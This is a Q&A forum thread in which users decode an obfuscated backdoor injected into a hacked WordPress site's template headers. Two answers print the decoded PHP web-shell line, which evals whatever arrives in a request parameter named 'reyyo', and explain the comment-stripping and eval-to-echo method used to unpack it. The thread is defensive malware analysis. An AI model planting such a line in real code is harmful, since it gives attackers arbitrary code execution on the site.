# Can some one decode this dirty code?

Tags: php, wordpress, base64, decode

One of my friend's wordpress website is hacked by someone and they put the following code on the header of all template files.

http://pastebin.com/dYcQ1Gri

I tried to decode it with base64 decoder. But the output looks odd. Can you guys tell me what type of encoding is this?

Comment: remove the inline comments and it is just decoding base64

Comment: I am really interested to know the answer for this question.

Comment: The first layer of base64 shows another eval + comments + base64... Gonna take a while. Use "\/\*([^\*]+)\*\/" to get rid of comments

Comment: WordPress is a notorious target for Trojan templates.  If the theme was downloaded from a third party, odds are it existed when you first got it.

Answer (score 4, accepted):

It's a series of eval+base64 encryption. After decoding, the code would be:

```
if (isset($_REQUEST['r' . 'e' . 'y' . 'yo']))
    eval(stripslashes($_REQUEST['r' . 'e' . 'y' . 'y' . 'o']));
```

Here's how I got that:

- Copy the entire code into your text editor
- Supply `\/\*.*?\*\/` as the search pattern, and replace with `''` (empty string)
- Now you'll get one or more `eval()` stattements. Change that to `echo`.
- Repeat

Basically this code will allow the attacker to inject and execute arbitrary code on your website.

Comment: Thank you so much Amal! :) Any idea how the hacker is beneficial with above code?

Comment: @Libin: This code will allow the attacker to inject and execute arbitrary code on your website.

Comment: Thank you @amal I'm removing the code from all the template files.

Comment: @Libin: I wouldn't use that template. And removing it wouldn't be a solution. **Find the vulnerability (if there is one) and fix it.**

Comment: Depending on the permissions set up, the injected code wouldn't have been able to modify the contents of the server.  However if they knew it was wordpress they could have changed content in the database.  User credentials for example.  I would get all your users to change their passwords ASAP.

Comment: @amal , It is not a third-party theme. It is a custom theme created by myself on the top of wordpress default theme. These injections happen on yesterday.

Comment: @Libin: My point still stands. Inspect your server logs to find out the cause of the issue. If this is a shared host, talk to your hosting support. Make sure your configurations, permissions etc. are correct.

Answer (score 3):

Easiest way to do this is to remove all comments (`/* */`) with regex, and then replace `eval()` with `echo()`. Rinse and repeat.

After two or three loops, it outputs the following:

```
if(isset($_REQUEST['r'.'e'.'y'.'yo']))eval(stripslashes($_REQUEST['r'.'e'.'y'.'y'.'o']));
```

Which means that it will `eval()` anything passed as `reyyo` in either `$_GET`, `$_POST` or `$_COOKIE`.

Comment: Or `$_COOKIE`. Somehow people always forget about that when using `$_REQUEST`

Comment: Interesting! Thank you so much for decoding this!